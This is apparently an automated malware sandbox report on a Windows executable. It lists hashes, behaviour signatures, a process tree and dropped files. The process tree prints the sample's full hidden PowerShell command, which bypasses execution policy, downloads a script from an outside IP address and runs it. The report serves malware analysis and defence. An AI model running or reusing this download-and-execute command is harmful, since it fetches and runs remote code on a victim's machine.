Overview

overview

10

Static

static

10

1edc123e5a...1c.exe

windows7-x64

10

1edc123e5a...1c.exe

windows10-2004-x64

10

215a9d6110...dd.exe

windows7-x64

7

215a9d6110...dd.exe

windows10-2004-x64

7

351e31a389...15.exe

windows7-x64

10

351e31a389...15.exe

windows10-2004-x64

10

7c711ab33a...07.exe

windows7-x64

8

7c711ab33a...07.exe

windows10-2004-x64

10

a6b647b495...2a.exe

windows7-x64

3

a6b647b495...2a.exe

windows10-2004-x64

3

d521f17349...54.exe

windows7-x64

10

d521f17349...54.exe

windows10-2004-x64

10

df468fc510...a2.exe

windows7-x64

10

df468fc510...a2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    15s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    06/03/2025, 00:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe

  • Size

    120KB

  • MD5

    5b3ed060facb9d57d8d0539084686870

  • SHA1

    9cae8c44e44605d02902c29519ea4700b4906c76

  • SHA256

    7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207

  • SHA512

    6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

  • SSDEEP

    3072:EV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPQT:pt5hBPi0BW69hd1MMdxPe9N9uA069TB6

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
    "C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EBE5.tmp\EBE6.tmp\EBE7.bat C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2160
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\EBE5.tmp\EBE6.tmp\EBE7.bat
    Filesize

    334B

    MD5

    3895cb9413357f87a88c047ae0d0bd40

    SHA1

    227404dd0f7d7d3ea9601eecd705effe052a6c91

    SHA256

    8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785

    SHA512

    a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    123a8dceee35e6d67f2ef09bd6a5a475

    SHA1

    d1770deaf44cad6b7324d9412fe89d514672d4a3

    SHA256

    9c578d1a8db2196df672f942e5bd51e74f9cbfc0716a311c971ef83838595765

    SHA512

    1c81ce4e932a73d5adaa053c0938586e3c7291c99a063b7ce6dca2a2754ce2b64fab31b9ba1a8b3e07c18302a3a924d3a5a2d66eb33211a2a4cfd17eef906bd0

    Download Submit

  • memory/2160-6-0x000007FEF662E000-0x000007FEF662F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2160-9-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2160-10-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2160-11-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2160-8-0x0000000001E00000-0x0000000001E08000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2160-7-0x000000001B5B0000-0x000000001B892000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2160-12-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2160-13-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

    Filesize

    9.6MB

    Download